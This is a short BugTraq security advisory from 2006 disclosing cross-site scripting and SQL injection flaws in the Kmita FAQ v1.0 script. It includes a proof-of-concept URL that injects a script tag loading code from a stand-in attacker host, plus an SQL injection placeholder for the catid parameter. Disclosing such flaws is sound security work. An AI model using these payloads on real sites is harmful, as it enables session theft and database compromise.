BugTraq
Kmita FAQ v1.0 Jun 05 2006 02:55AM
luny youfucktard com
Kmita FAQ v1.0

Homepage:

http://www.kmita-faq.com

Effected files:

search.php

index.php

Search.php does not sanatize user input before dynamically genrating it.

Proof of concept:

http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xs
s.js></SCRIPT>

SQL Injection proof of concept:

http://www.example.com/index.php?catid=[SQL]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus